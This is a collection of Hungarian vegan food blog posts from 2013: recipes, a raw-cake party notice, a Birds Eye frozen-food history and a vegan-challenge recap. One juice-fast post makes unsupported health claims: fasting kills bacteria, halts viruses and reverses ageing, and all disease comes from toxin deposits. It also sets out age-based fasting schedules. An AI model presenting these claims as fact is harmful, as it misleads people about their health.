Ma reggel egy kis édességet készítettem, kb. 5 perc az előkészítés és 20 perc a sütés. Hozzávalók - 10 db-hoz: 2 nagyobb alma 1 csomag Tante Fanny leveles tészta -- 4 ek. 100% extra szűz olívaolaj 4 ek. darált dió 2 ek. Xilit (nyírfacukor) 2 tk. kardamom -- 5-10 szem eper/meggy/cseresznye Elkészítés: Az almákat megmossuk és felkarikázzuk, úgy, hogy karikázást követően minden kör közepéről óvatosan kivágjuk a csumát. A leveles tésztát kicsomagoljuk, és kb. 1,5 cm-es csíkokra vágjuk. Az almakarikákba belebújtatunk 2-2 leveles tészta csíkot, majd egy tálba töltjük az olajat, hozzáadjuk a diót és a nyírfacukrot, és ezzel lekenjük. 180 fokon 20 perc alatt kisütjük.
Édesköményes csicseriborsó saláta
2013. május 21. Mindennapi ételeink
Ez még egy régebbi salátarecept, de most van egy kis idő posztolni. Hozzávalók: 1 konzerv csicseriborsó -- 1 édeskömény levele, felaprítva 1 ek. citromlé 1 tk. mustár 6 ek. 100% extra szűz olívaolaj kb. 1 dl víz pár friss bazsalikom levél só-ízlés szerint Elkészítés: A csicseriborsót tálba tesszük.Az öntet hozzávalóit összekeverjük. Mindezt összeforgatjuk, majd egy kis ideig behűtjük és 1-2 órán belül tálaljuk.
Áfonya krém - smoothie
2013. május 15. Fittanyuka Blog
Ajánlom az alábbi finomságot reggeli, tízórai gyanánt, vagy néha felválthatjuk a zöld klorofill koktélunkat egy ilyen antioxidánsban, flavonoidokban, klorofillben szintén gazdag smoothiera. Az áfonya szintén egy alacsony cukortartalmú gyümölcs, tehát kevésbé erjed, az édeskés ízt pedig megadhatjuk neki steviával, amit egyáltalán nem cukorként kezel a szervezet! A smoothie krémességét az avokádó adja. Hozzávalók: 2 főre 2 marék fekete áfonya 1 db hámozott, puha avokádó 1 marék friss spenót levél 4 dl mandula tej, vagy más növényi tej 1/2 kk borubon vanília őrlemény 1/2 kk stevia por Ha inkább krémet szeretnénk adjunk hozzá kevesebb mandula tejet és 2 evőkanál kókusz tejszínt. Az összetevőket alaposan összeturmixoljuk. Tipp: nyári hőségben készíthetjük fagyasztott áfonyával, desszertként akár! Fittanyuka
Nyers torta parti május 16-án 17-20 óra között
2013. május 10. Nyersétel akadémia
Gyere el hozzánk, és kósold meg egészséges, nyers tortáinkat!
Ezek az édességek liszt, tej, tejtermék és tojás nélkül készülnek, és nincs bennük hozzáadott cukor!
Amit használunk: diófélék, datolya, gyümölcsök, kakópor és természetes fűszerek, pl. vanília, fahéj…
A partira a belépés díjtalan, kizárólag a fogyasztás után kell fizetni! Bejelentkezni nem szükséges, egyszerűen csak nézz be hozzánk munka után, 17 és 20 óra között!
Minden torta szelet 400 Ft
Várhatóan lesz epres torta, csokitorta, gundel palacsintás torta, és sok újdonsággal is készülünk.
Narancsos csokis torta:
Epres csoki torta :
Felvágva:
Citromos-avokádós torta:
Csokitorta: (gyümölcs nélkül, csak csoki)
Hűsítő Mangókrém
2013. május 7. Fittanyuka Blog
Ahogy melegszik az idő egyre könnyebb és könnyebb és nyersebb ételeket kívánnunk. Nyáron sokkal könnyebb egy lúgosító táplálkozást, vagy akár nyers táplálkozást folytatni. A meleg miatt előtérbe kerülnek azok az ételek amelyek hűtik a szervezetet, ilyen minden nyers zöldség és gyümölcs, saláta, stb. Ha valami nyalánkságra vágyunk nyáron általában előkapom a turmixgépem és összeütök valami finomat, a gyorsaság sem hátrány. Édesítést nem használtam, maradt a gyümölcsök természetes édes íze. Ilyen az alábbi poharas desszert is: Hozzávalók: 1 db lehéjazott mangó 1 db lehéjazott alma 200 ml kókusz tejszín késhegynyi bourbon vanília 1/2 bio citrom reszelt héja 1/2 kk agar-agar, vagy útifű maghéj őrlemény kókusz chips a díszítéshez Az alapanyagokat alaposan összeturmixoljuk és a kókusz chipsszel díszítjük! Fogyasztás előtt le is hűthetjük kicsit. Fittanyuka
Barackos szezámos sütemény sárgadinnyés teával (tej és tojásmentes)
A következő receptnek két különlegessége is van amellett, hogy sem tejet, sem tojást nem tartalmaz. Az egyik az, hogy igazi kalcium-bomba, mivel egy jó adag szezámmag van a tésztájában, sőt a tetejét is megszórtam szezámmal. A másik specialitása pedig a sárgadinnye-ízű tea, ami a kevert tészta nedves alapanyagát adta. Nem hagyhattam ki, hogy a nyáron aszalt sárgadinnye-karikákból ne áztassak meg egy keveset és keverjem a tésztához. Ráadásul az aszalt gyümölcsnek köszönhetően kevesebb cukor-féleség kellet bele, mivel a tésztát így különleges módon édesítettem.
A recept:
Hozzávalók:
- 1 bögre szezámmag
- 1/4 bögre barna cukor vagy valamivel kevesebb gyümölcscukor, nyírfacukor (attól függően, hogy ki mivel édesít)
- 1/2 bögre gabonatejpor
- 1 bögre tea (nekem sárgadinnye tea volt)
- pár szem aszalt sárgadinnye (felcserélhető - tea ízvilágától függően - más gyümölcsre)
- 2 evőkanál olaj
- 1/2 bögre víz (szénsavas jobb, de most szénsavmentessel készítettem)
- 1 csapott teáskanálnyi szódabikarbóna
- liszt, amennyi hasonló állagúvá teszi, mint a piskótamassza, de nem túl folyós
- sütőpapír
Elkészítés:
Egy keverőtálba először a szezámmagot összekeverjük a gabonatejporral, majd az apró darabokra vágott és a teában is megáztatott aszalt gyümölcsöt és a teát, végül a vizet és olajat is hozzáadjuk, elkeverjük. Ehhez a masszához keverünk annyi lisztet, amitől piskótaszerű állagot kapunk. Vegyesen tettem bele fehér és teljes kiőrlésű lisztet 2/3 arányban a fehér liszt javára. Utolsó körben a szódabikarbónát adjuk a sütemény nyers tésztájához. A masszát simára keverjük, majd sütőpapírral (vagy szilikonlappal) bélelt tepsibe öntjük, kanalazzuk a masszát. A tetejére pedig a fagyasztóból elővett és kicsit kiengedett, felkockázott sárgabarackot tesszük. Végül megszórjuk szezámmaggal. Közepes lángon legalább 40 perc sütés szükséges. Tűpróbával ellenőrizzük. Mivel a barack fagyasztóból jött, így a sütés végére olyan lett, mintha lekvár került volna a sütemény tetejére. Ízletes lett.
Védekeznek a növényelk a klímaváltozás ellen
Akár 30 százalékkal is csökkenti a felmelegedést az erdők természetes ellenreakciója.
Cukkini - lasagne
Itt a blogon szerepelt már korábban egy cukkinis lasagne recept, de ez a mostani sokban eltér attól.:-) Pl. ez a variáció nem csak hús-, tej- és tojás-, hanem gluténmentes is!:-) Mert hogy a lasagne lapokat cukkini-szeletek helyettesítik. És alig főzött-sütött!:-) Érdemes karakteresen ízesíteni, mert bőven elbírja!:-) A mandulakrémes szósz pedig akár el is hagyható szerintem a tetejéről, illetve ha mégis ráteszi valaki, akkor jól sózza-borsozza meg, mert elég édes a mandulakrém magában! Cukkini - lasagne Hozzávalók (1 főre!): 180 g natúr tofu 1 vöröshagyma, felaprítva 1 gerezd fokhagyma, aprítva 120 g sárgarépa, finomra aprítva kb. 4 ek. olívaolaj 130 g paradicsom sűrítmény 1 tk. szárított oregánó 1,5 tk. agave szirup 70 ml víz (eredetileg vörös bor, de én azt nem használok) só, bors 1/2 csokor bazsalikom, felaprítva 1 cukkini 15 g natúr fehér mandulakrém 10 ml víz Melegítsük elő a sütőt 250 fokra. A tofut morzsoljuk szét villával. 2 ek. felforrósított olívaolajon pirítsuk a tofut 3 percig, majd adjuk hozzá a zöldségeket és még 3 percig pirítsuk együtt. Keverjük bele a paradicsom-sűrítményt, az oregánót és az agave szirupot. Öntsük fel a vízzel, sózzuk-borsozzuk, és 1,5 percig főzzük még együtt. Vegyük le a tűzhelyről és adjuk hozzá a felaprított bazsalikomot. A mandulaszószhoz keverjük el a mandulakrémet a vízzel, sózzuk-borsozzuk. A cukkinit egy zöldséghámozóval vágjunk nagyon vékony szeletekre, és sózzuk kicsit, illetve locsoljunk rá 1 ek. olívaolajat. Fektessünk néhány cukkini-szeletet egy tepsi aljára, rá 2 ek. bolognai mártást, és így folytassuk tovább a rétegezést! A tetejére kenjük rá a mandulakrémet, és toljuk a sütőbe kb. 5 percre. Forrás: Attila Hildmann: Vegan for Fit
Rakott (savanyú)káposzta cserépedényben sütve (vegán)
Labrador fagyos földjén, Kanadában, az 1900-as évek elején egy prémvadász törte a jeget a sós vízzel megtöltött hordókban, hogy hozzájusson egy fagyasztott káposztafejhez. Clarence Birdseye, egyszerűbb nevén Bob, ahogyan ő szerette, kidolgozott egy különleges élelmiszer-fagyasztási módszert, hogy felesége kedvébe járjon, aki elszigetelve a hosszú fagyos hónapok alatt nagyon hiányolta a friss zöldséget. Bob Birdseye ezzel megcsinálta szerencséjét.
Az 1900-as évek elején Bob és Eleanor Birdseye egy kis faházban éltek fiukkal északon, 400 km-re mindenféle bolttól és orvostól. Akkor költöztek oda, amikor a családfő abbahagyta a tanulmányait Massachusetts Amherst College-ben, mert a családja nem tudta tovább támogatni. Talált munkát, de mint örökös kockázatvállaló, meggyőzte Eleanort, hogy szőrmekereskedésből jobban élhetnének.
Birdseye megtanulta, amit az észak-kanadai őslakosok már régen tudtak: a húsnak jobb íze van, ha gyorsan lefagyasztják. A halat, nyulat és kacsát a szabadban, -50 C fok körüli hőmérsékleten tárolták, így kiválóan megtartották az ízüket. Bob elhatározta, hogy megpróbálkozik a káposzta tartósításával is, erre sós vízzel töltött hordókat használt. Később szerényen így nyilatkozott: Az eszkimók évszázadok óta így tartósítanak. Amit én csináltam, az csupán a csomagolt, fagyasztott élelmiszer elterjesztése. 1917-ben a család visszatért az Államokba, ahol Bob megkísérelt a labradori tél reprodukálásával üzemeltetni egy fagylaltgyárat New Jersey-ben, jégtömbökkel, tengervízzel és elektromos ventilátorral. Válallakozása csődbe ment. Ezután a család Gloucesterbe költözött (Massachusetts), ahol Birdseye tovább kísérletezett a hús, hal és zöldségek gyorsfagyasztásával. Épített egy hordozható fagyasztót is, ezt felrakta egy kamionra, és járta a vidéket, hogy a helyszínen fagyaszthassa a frissen begyűjtött zöldségféléket.
Véletlenül Majorie Merriweather Post, egy élelmiszer-feldolgozó tulajdonosának lánya, megkóstolta Birdseye fagyasztott libáját. Három évvel később már nemcsak libát vásárolt Bobtól, hanem megvette a családi vállalkozást, és 1930-ban a vég nevét Birds Eye-ra változtatta. Érdekes, hogy végül nem a káposzta volt az első nagy tömegben piacra dobott fagyasztott zöldségáru, hanem a borsó. (Forrás: Bill Laws:Ötven növény, amely megváltoztatta a történelmet )
Következő receptemben ugyan nem fagyasztott, de más módon - savanyítással - tartósított káposzta az egyik főszereplő.
A recept:
Hozzávalók:
30 dkg savanyú káposzta (nekem házi volt, ismerősöm készítette)
20 dkg szójagranulátum
1 nagyobb hagyma
fokhagyma
ételízesítő/só
őrölt köménymag
20 dkg barna rizs
piros fűszerpaprika és/vagy piros paprika krém
növényi tejföl
Elkészítés:
A cserépedényünket legalább fél órára, de akár többre is, vízbe áztatjuk. A savanyú káposztát vízzel jól átmossuk. A (ételízesítővel vagy sóval megszórt) szójagranulátumot meleg/forró vízben áztatjuk legalább fél órát. A barna rizst pedig megfőzzük roppanósan puhára. A hagymákat felaprítjuk, teflon bevonatú lábosban kevés vízzel kicsit megdinszteljük, rátesszük a kinyomkodott szójagranulátumot, fűszerpaprikával és/vagy piros paprikakrémmel és az őrölt köménnyel fűszerezzük, szükség esetén sózzuk. Adunk hozzá egy kevés vizet, pörkölt állagúra főzzük. A megfőtt rizst hozzákeverjük. A szójás pörkölt-szósz "levét", ha nem túlfőzött rizzsel dolgozunk, akkor a rizs magába szívja. Miután a rizst és a szóját összekevertük, az áztatott cserépedénybe rétegezve rakjuk. Legalsó réteg a kimosott savanyú káposzta, majd a szójás rizs. A rétegezést addig folytatjuk, míg van hely az edényben. A legutolsó sor a szójás rizs legyen, amit növényi tejföl megkenésével zárunk. Lefedjük a cserépedény tetejével és megsütjük kb. 30 perc alatt.
Fokhagymás-paprikás bébi burgonya a Föld napjára
2013. április 22. La Veganista
Ma van a Föld napja, ami arra hívja fel a figyelmünket, hogy bolygónk túlélése érdekében meg kell teremtenünk a környezetbarát, fenntartható társadalmat. A fenntarthatóság egyik sarkalatos pontja az ipari méretű állattartásból adódó környezetkárosítás folyamatos csökkentése, majd megszüntetése. Több szervezet, köztük a PETA is rámutatott arra, hogy az állattartásnak köze van a klímaváltozáshoz, vízszennyezéshez, talajleromláshoz, a biodiverzitás csökkenéséhez. Az állati alapú étrend több földet, vizet és energiát használ, mint a szigorúan vegetáriánus, illetve a vegán. Ma még sokak számára csodabogárnak számít az, aki nem eszik állati eredetű ételeket. Talán azért, mert úgy gondolják, hogy a vegán táplálkozás egyhangú, unalmas és egészségtelen. Ez a blog ezt a téves feltételezést szeretné megcáfolni a maga szerény eszközeivel. Bár most még távolinak tűnik a fenntartható társadalom elérése, de a Föld napjának jelmondata reményt ad erre: ""Ki mondta, hogy nem tudod megváltoztatni a világot?" A jeles nap alkalmából egy könnyen és gyorsan elkészíthető étel receptjével szeretnélek arra biztatni, hogy tedd meg te is az első lépést közös célunk felé.
Hozzávalók:
- 450g bébi burgonya (megfőzve)
- 2 evőkanál olívaolaj (vagy más növényi olaj)
- 4 db szárított erős paprika
- 2 evőkanál fokhagyma (apróra vágva)
- 1/2 teáskanál édes paprikakrém (pl. Édes Anna)
- 1/2 teáskanál szója szósz (gluténérzékenyek Tamari szószt
- használjanak!)
- 1 teáskanál őrölt fekete bors
- 1 evőkanál citromlé
- 2 evőkanál koriander levél
- só ízlés szerint
Így készítsd el:
Egy nagyobb serpenyőbe öntsd bele a növényi olajat, ne hevítsd fel, csak közepes lángon melegítsd elő. Dobd az olajba a szárított paprikát és az apróra vágott fokhagymát.
Pirítsd át finoman, hogy az olaj átvegye az erős paprika és a fokhagyma aromáit. Nagyon fontos, hogy ne égesd le a fokhagymát, mert akkor megkeseredik. Add hozzá a szója szószt, a paprikakrémet, a citromlevet, a fekete borsot és sózd meg. A szószt 2-3 kanál vízzel lazítsd fel, majd öntsd a serpenyőbe a bébi burgonyát. (Tipp: A burgonyákat előzőleg finoman megszurkálhatod egy villával, hogy a szósz ne csak a felszínükre tapadjon, hanem beszivároghasson a belsejükbe is.) Forgasd meg a szószban burgonyákat és tálalás előtt szórd meg koriander levéllel, és egy csipet fekete borssal.
Édes burgonyás tofurántotta
Egy rendkívül egyszerű, ám ugyanakkor magas fehérjetartalmú étel, amit akár reggelire is fogyaszthat, aki kedveli reggel a sósabb ízeket (én nem tartozom közéjük:-))), de ebédre is megállja a helyét salátával, vagy kalóriadúsabb verzióban pirított barna kenyérrel. És mivel az édes burgonya előtte sütőben sül, a zsírtartalma is elenyésző! Régebben készítettem már cukkinis-snidlinges tofurántottát is, a receptje ITT! Édes burgonyás tofurántotta Elkészítési idő: kb. 30 perc Hozzávalók (2-3 főre): 450 g édes burgonya, vékony karikákra vágva 3 ek. olívaolaj só 2 újhagyma, felkarikázva 280 g natúr tofu 80 g füstölt tofu, felkockázva 1 ek. natúr fehér mandulakrém 4 ek. víz 1 vöröshagyma, finomra aprítva 2 késhegynyi kurkuma őrölt bors Melegítsük elő a sütőt 250 fokra! 2 ek. olívaolajat keverjünk el egy kis sóval, és egy sütőpapírral kibélelt tepsiben vegyítsük el az édes burgonyával. A sütő legfelső sínjére tolva süssük 12-15 percig, amíg kicsit pirulni kezd. A natúr tofut törjük szét egy villával. A mandulakrémet keverjük el a vízzel. 1 ek. olívaolajat forrósítsunk fel egy serpenyőben, és a füstölt tofut pirítsuk benne kb. 3 percig. Adjuk hozzá a vöröshagymát és a kurkumát és süssük még 2 percig. Tegyük bele a a natúr tofut is, még pirítsuk 1 percig, és öntsük rá a vizes mandulakrémet. Óvatosan hozzáadjuk a megsült édes burgonyát, sózzuk-borsozzuk. Alapötlet: Attila Hildmann: Vegan for Fit
Sült édesburgonya tofuval és növényi tejföllel
2013. április 18. Vera vega konyhája
Kaptam édesburgonyát. Még sose ettem ilyet. Amit készítettem belőle, az szerintem nagyon finom volt, de a gyerekek nem így gondolták: meglepő módon pont az ÉDESburgonya nem ízlett nekik. Pedig nagyon finom, ízre valahol a sütőtök, a répa és a krumpli keveréke :) Hozzávalók: 1 kg édesburgonya 1 csomag medvehagymás tofu szójaszósz olívaolaj mindenféle fűszerek ízlés szerint, nálam: majoranna, oregano, római kömény 1 marék napraforgómag 2 gerezd fokhagyma annyi víz, amivel krémes lesz méz citromlé mustár Az édesburgonyát meghámoztam, kockákra vágtam. A tofut is kockákra vágtam. A kettőt összekevertem, és pár órára bepácoltam a szójaszósz, olaj és fűszerek keverékével. Tepsiben sütöttem meg 180 fokos sütőben, kb. 40 perc alatt. A növényi tejfölhöz a hozzávalókat összeturmixoltam alaposan, sóztam is, adagokat nem írok, mert ez nagyon ízlés szerinti műfaj. A kettőt együtt tálaltam.
Vadasmártás
2013. április 14. Fittanyuka Blog
A mártás nevének semmi köze a vadakhoz, legalábbis nem szeretném:)! Az elnevezésen nem szerettem volna változtatni, mert így mindenki tudja miről van szó. Karamelizált cukor helyett kókusz cukrot használunk, mert természeténél fogva enyhén karamellizált ízű és természetes édesítő. Nagyon finom bundázott zöldségekhez, tönköly fehérjéhez, krokettekhez, tésztához, fasírtokhoz, vagy bundázott gabona sonkához, stb. Hozzávalók 4 főre: 1 db közepes zeller 1 db nagy szál gyökér 3 nagy répa 3-4 db babérlevél 2 db nagyobb krumpli 1 db nagyobb hagyma néhány fekete szemes bors 2-3 kk himalaya só 1 evőkanál kókusz cukor 3 evőkanál kókusz tejszín Víz 1 db citrom leve A zöldségeket tisztítás után rusztikus darabokra szeleteljük és a víz, citromlé, só, fekete bors segítségével pác levet készítünk. Annyi vízzel, hogy ellepje a zöldségeket. Érdemes előző este bepácolni a zöldségeket és másnap a páclével együtt, lassú tűzön addig főzzük amíg a zöldségek megpuhulnak. Leöntjük a felesleges vizet és a kókusz tejszín, kókusz cukor hozzáadásával összeturmixoljuk. Ha szükséges még sózzuk. Fittanyuka
Citromfüves eperkrémleves
2013. április 12. Mindennapi ételeink
Ennek a levesnek a receptje felkérésre született, hamarosan kiderül, mi is ez a projekt :-) Hozzávalók: 1,5 kg eper 3 dl Alpro édes szójatejszín kb. 1 l Alpro vaníliás szójatej 2 ek. főzés nélkül készíthető vaníliás pudingpor 5-10 dkg nyírfacukor (az eper édességétől függően) 4-5 levél citromfű Elkészítés: Az epret alaposan megmossuk, és egy szűrőbe téve lecsepegtetjük. Majd egy magas falú edénybe áttesszük, ráöntjük a szójajoghurtot, majd hozzáadjuk a vaníliás pudingport, és az egészet alaposan összeturmixoljuk. Ezt követően édesítjük, és hígítjuk a vaníliás szójatejjel, olyan állagúra, amilyenre szeretnénk. Citromfűvel és keksszel tálaljuk.
2013 Tavaszi Virtuális Lékúra:
2013. április 9. Fittanyuka Blog
A várva várt tavasz lassan, nehézkesen érkezik, annál is jobban vágyjuk a megújulást! Toltuk az időpontot, hogy hátha melegszik az időjárás, bízunk benne, hogy ez április vége fele közeledve majd bekövetkezik. A nagy érdeklődésre való tekintettel, természetesen nem maradhat el idén tavasszal sem a méregtelenítés! Mint látjátok egy feliratkozó ablakot hoztunk létre az oldalsávban a Jelentkezem a Virtuális léböjtre elnevezéssel, elég ide felíratkoznotok és automatikusan a Lékúrázók csoportjába kerültök! A levelek a korábbi alkalmakhoz hasonlóan fognak érkezni a tennivalókkal: Bevezető szakasz, bevásárló lista a böjthöz, tippek a lékúrához, lé receptek és tanácsok a levezető szakaszhoz. Továbbá újdonság, hogy a tippek, tanácsok a facebook / Fittanyuka - Lúgosító ételek oldalon is megosztásra kerülnek, továbbá itt erősíthetjük egymást tapasztalatokkal, stb. Szintén a facebook oldalon, mint Esemény is szerepel, javaslom csatlakozzatok itt is, ugyanis itt szeretném ha mindenki interaktívan közreműködne, mert együtt könnyebb:). Program: Április 15 - től egészen a lékúráig, április 22-ig fog tartani a bevezető szakasz. Mindenki saját felelősségére annyi napot csinál végig amennyit úgy érez, hogy elbír! Hét napnál többet én nem javaslok! A böjt hatása nem a napok számától erősebb elsősorban, hanem a bevezető és a levezető szakasz tudatos felépítésétől! Szokták mondani, hogy könnyebb betartani azt, hogy csak leveken élünk napokig, mint utána ésszerűen, tudatosan étkezni, felépíteni a táplálkozást és így segíteni a szervezetnek, hogy a tisztulási, sejtregenerálódási, - megújulási folyamat még a böjt után hetekkel is kitartson! Az ingyenes levélsorozat április 12-én, pénteken indul, és először a bevezető szakasz étrend tanácsait fogja tartalmazni! Már leírtam korábban, de az ismétlés nem árt, nézzük milyen hatásra számíthatunk, ki böjtölhet és ki nem: A lékúra után legyen szó kettő, három vagy több napos kúráról, ideális időszak az életmódváltáshoz . Csak egyetlen betegség létezik: a méreglerakódás Romolo Mantovani A böjt hatásai: - intenzíven pusztítja a behatoló baktériumokat, - gátolja a vírusok terjedését és növekedését, - fokozza a vér és a sejtek ellenállóképességét, - elősegíti a betegség kiváltó, egyéb méreganyagok kiválasztását, - méregtelenít, salaktalanít, a sejtek, szövetek fellélegeznek, - kiküszöböli a savas lerakódásokat, - meghatványozza az életerőt, - áthangolja, megnyugtatja a vegetatív idegrendszert, - tehermentesíti az anyagcsere - folyamatokat, - gyulladáscsökkentő, - csökken a szövetek só tartalma, a felesleges nátrium kiürül, - a felesleges cukor, zsír és fehérje lebomlik, - megszépíti a bőrt, és fokozza a szövetek rugalmasságát, - feltartóztatja az idő előtti öregedési folyamatokat. Ez elég ok, hogy évente kétszer: tavasszal és ősszel méregtelenítsünk! Mikor érdemes böjtölni? 1. Túlsúly esetén ( napi 350-450 gramm fogyás lehetséges), 2. különböző szervi megbetegedések esetén ( máj, vese, hasnyálmirigy), 3. Anyagcsere problémák esetén, 4. Gyulladásos folyamatok esetén, 5. Szív- és érrendszeri problémák esetén ( pl. magas vérnyomás), 6. Lelki nyugalom hiányakor. Az év többi részét tekintve 21 éves kortól 42 éves korig heti egy nap böjt, 42 éves kortól 63 éves korig heti két nap böjt, és 63 éves kor felett pedig három nap böjt ajánlott. Az ellenjavallatok miatt fontos, hogy mielőtt valaki hosszabb böjtbe kezd, beszélje meg orvos szakemberrel! Nem szabad böjtölni: - tuberkulózis bizonyos eseteiben, - szoptatás, áldott állapot esetén, - 21 kor előtt, - daganatos betegségben szenvedőknek, - operáció után 1-1,5 hónapig, - betegség utáni kimerültség esetén, - depresszió egyes eseteiben, - anorexia ( kóros soványság) esetén, - pajzsmirigy túlműködés esetén, - májcirrózis ( májzsugorodás) esetén, - bizonyos szívbetegségek esetén ( cardiomiopathia). A böjtre jelentkezés feltételei: Először is a kellő elszántság, utána az ingyenes levelekre való feliratkozás a bevásárló listáért, tanácsokért, infókért! Motivációért, bíztatásért és egymás támogatásáért pedig javaslom csatlakozzatok a facebook / Fittanyuka - Lúgosító ételek oldalhoz és a facebook / Tavaszi Virtuális Lékúra Eseményhez! A böjtölés tudománya: Tovább olvasom... Fittanyuka
Paprikás avokádókrém
Eddig azért nem tettem fel avokádós receptet, mert a kedvenc fogyasztási módom az, ha az avokádószeleteket pár csepp citromlével megízesítem és magában elfogyasztom, esetleg kenyérrel, pászkával. Így aztán, ha van is itthon avokádó, a fent említett módon egy ülőhelyben pillanatok alatt elfogy.:) De mostanában amúgy is több helyen olcsóbban kapható (90 és 100 Ft volt darabja....), így rászántam magam, és krémet készítettem belőle - fincsi házi paprikakrémmel felturbózva. Igazán gyors és egyszerű pástétom, aminek az elkészítése gyorsabb, mint az elfogyasztása. (Szerintem ezt nem mindig lehet elmondani a finom ételekről, most azonban igen.) Ami az avokádó jó tulajdonságait illeti, alacsony cukortartalma van, így cukorbetegek, inzulinrezisztencia-betegek is fogyaszthatják. A-, B1-, B2-, C- és E-vitamint tartalmaz, kálium, magnézium, foszfor, cink is megtalálható benne. Magas vérnyomás, érelmeszesedés és gyomorbántalmak ellen is ajánlják. Érdekessége még az, hogy a kozmetika iparban is használják. Mivel magas olajtartalma van, ezért a kiszáradt, öregedett bőr táplálásához alkalmazzák. Ekcémás bőr tüneti kezelésére is felhasználják. Magjából pedig gyógyszirupot állítanak elő, ami a reumatikus fájdalmakra lehet gyógyír. A kőmag tejszerű nedve a levegővel érintkezve vörösre színeződik, ez szolgált az indiánoknál a textilfestésre.
A recept:
Hozzávalók:
1 -2 db avokádó
1-2 gerezd fokhagyma kissé megpárolva
1 evőkanál piros paprikakrém
Elkészítés:
Az avokádókat félbevágjuk, műanyag kanállal kikaparjuk és műanyag vagy fa villával összenyomkodjuk. A fokhagymákat egy picit megpároljuk (Legjobb, ha egy edénybe vizet teszünk és fölötte szűrőben pároljuk), majd összenyomjuk és az összetört avokádóhoz keverjük, végül egy kevés piros paprikakrémet is hozzákeverünk.
Kész is a finom avokádókrémünk.
Feketeáfonyás reggeli
Melegítős, finom, édes, egészséges…. soroljam még? Vasárnapi reggeli, mert megérdemlem Hozzávalók személyenként: 1 marék zabpehely 1 ek kókuszreszelék 2 ek aszalt feketeribizli 2 ek tiszta melegvíz 1 tk házi méz Éjszakára beáztattam az áfonyát. (Ezt feketeáfonya tea formában vettem a bioboltban) Reggel összekevertem a száraz zabpelyhet a kókusszal, majd pici forróvizet öntöttem rájuk. Rákanalaztam az [...]
30 nap tapasztalatai a 30 NAPOS VEGÁN KIHÍVÁS UTÁN
Némiképp megkésve, de azért végre eljutottam oda, hogy összefoglaljam az eltelt 1 hónap tapasztalatait...:-) Amikor február végén megfogalmazódott bennem a gondolat, hogy megcsinálom, egyáltalán nem gondoltam, hogy ilyen nagy visszhangja lesz a kezdeményezésnek...:-) Egy hét alatt 800-an csatlakoztak a Facebook oldalhoz, és 150-en jelezték, hogy belevágnak! Ez azért is volt nagyon meglepő számomra, mert amikor több, mint 20 évvel ezelőtt elkezdtem a vegetáriánus étkezést, még nagyon sok évig általában nem volt tanácsos nagyon reklámozni, hogy így étkezik az ember... Úgy tűnik, végre sokat változott a világ, és Magyarország is a témában, szerencsére elfogadóbbak, nyitottabbak lettek talán az emberek... És egyre többen keresik az egészséghez, a fizikai jól-léthez, jó közérzethez vezető utat! Ami pedig különösen megérintett, hogy nagyon sokan voltak a jelentkezők közül, akik előtte még sosem próbálták a vegetáriánus étkezést, és előtte húsevőként vágtak bele! Emelem kalapom előttük is!! NAGYON KÖSZÖNÖM ÉS RENDKÍVÜL HÁLÁS VAGYOK MINDENKINEK, AKI VELEM TARTOTT EBBEN A NAGY KALANDBAN!:-) Bízom benne, hogy minél többet sikerült megtapasztalni a vegán étkezés előnyeiből és új tapasztalatokkal gazdagodtatok az önmegismerés útján is!:-) És nem utolsó sorban megemlítve azt az óriási előnyt, hogy mennyi állati eredetű élelmiszer, és mennyi állat nem került elfogyasztásra ezen időszak alatt....!!! És közösen hozzájárultunk, még ha piciben is most, a Föld jobb létéhez!! Megpróbálom összefoglalni a saját személyes tapasztalataimat, de nagyon megköszönöm, ha mindenki más is, aki részt vett a programban, megosztja mi változott benne, körülötte ez idő alatt, mert sokat segíthetünk így másoknak is! Mik voltak a személyes céljaim a programmal? - szerettem volna visszatérni a vegán, és ugyanakkor TUDATOSan egészséges, és NEM puding (azaz nem összevissza evős, csak a húst kerülő)-vegetáriánus étkezéshez; - le akartam tesztelni, és leginkább fejleszteni azt, hogyan tudom összeegyeztetni, hogy két félét főzök, azaz magamnak és a családnak is külön; - fogyni szerettem volna kb. 4 kg-t; - az adalékok, a cukor és a fehér liszt teljes mellőzésével némileg tisztítókúrát is adni a testemnek:-); - beépíteni a rendszeres cardio mozgást az életembe. Mit sikerült megvalósítani a célokból? - a visszatérés a vegán étkezéshez abszolút nem volt nehéz számomra (volt már olyan 5 év, amikor úgy étkeztem, és tojást nem, tejterméket amúgy is ritkán fogyasztottam), és megtapasztaltam, hogy tudatos tervezéssel, igen is lehet gyorsan és finomakat főzni!:-) - a családi két felé főzés azért annyira nem realizálódott sajnos...:-( Ebben a hónapban bizony a család volt az, és nem én, aki több félkészet evett...:-/ A férjem szerencsére beszállt a reggelikbe-vacsorákba, így ő legalább velem tartott az étkezésben, de a gyerekek mivel nagyon korlátozottan fogyasztják sajnos a zöldségeket-gyümölcsöket, elég ritkán volt megvalósítható, hogy az egyik fajta hozzávalóból, kis módosítással nekik is csináljak valamit... Ezen a területen sokat kell még fejlődnöm, úgy érzem... - fogytam 3 kg-t, a derékbőségben -4 cm, a csípőben viszont csak alig -2 cm, úgyhogy előre tovább az úton!:-)) - a fehér liszt, cukor, adalékok elhagyása egyáltalán nem volt nehéz... - a saját mozgás terén is ugyancsak van még mit fejlődni...:-) A napi 20 perc mozgás heti legalább 4 nap megvolt (illetve én heti több nap tartok CANTIENICA(R) -órákat is, amikor azért tornázom is mindig kicsit), de a cardio bevetése elmaradt a tervezettől... Általában heti 1 sikerült csak... :/ Ebben is van még mit fejlődni!! Mit hozott nekem a kihívás személy szerint? A nagyobbik gyermekem lassan 8 éves, és amióta ők megszülettek, nagyon sokat koncentráltam az ő étkezésükre... Noha ezt a blogot is írtam, sokszor futottam azért bele félresikerült vegás ételekbe. Az elkeseredettség és frusztráció amiatt, hogy már a főzés megkezdésekor tudtam, a zöldség-gyümölcs nem túl nagy sikert fog náluk aratni, és nem az ő szájízük szerint főzök, sokszor vezetett további félresikerült ételekhez. Egy idő után nagyon elment a kedvem, hogy újabb vegás ételekkel próbálkozzak, vagy hogy egyáltalán bármit is főzzek... Ez alkalommal úgy indultam neki a 30 napnak, hogy elengedtem ezt az érzést, elfogadtam, hogy ők úgysem ezt fogják enni, ezen nem érdemes stresszelnem, a férjem és én viszont jókat eszünk majd!:-) És ez a belső átalakulás meg is hozta az eredményét, mert nagyon finomra sikeredtek az ételek, a férjem is megjegyezte, hogy valójában mióta együtt vagyunk (12 éve:-), most főztem a legfinomabb, legízletesebb vegás ételeket...:-))) Na és persze zseniálisan jó az Attila Hildmann: Vegan for Fit könyv is! - a program végére pedig sokkal könnyebbnek éreztem magam, nem vágytam sóvárogva a klasszikusan egészségtelen ételek, édességek után! Beálltam a napi 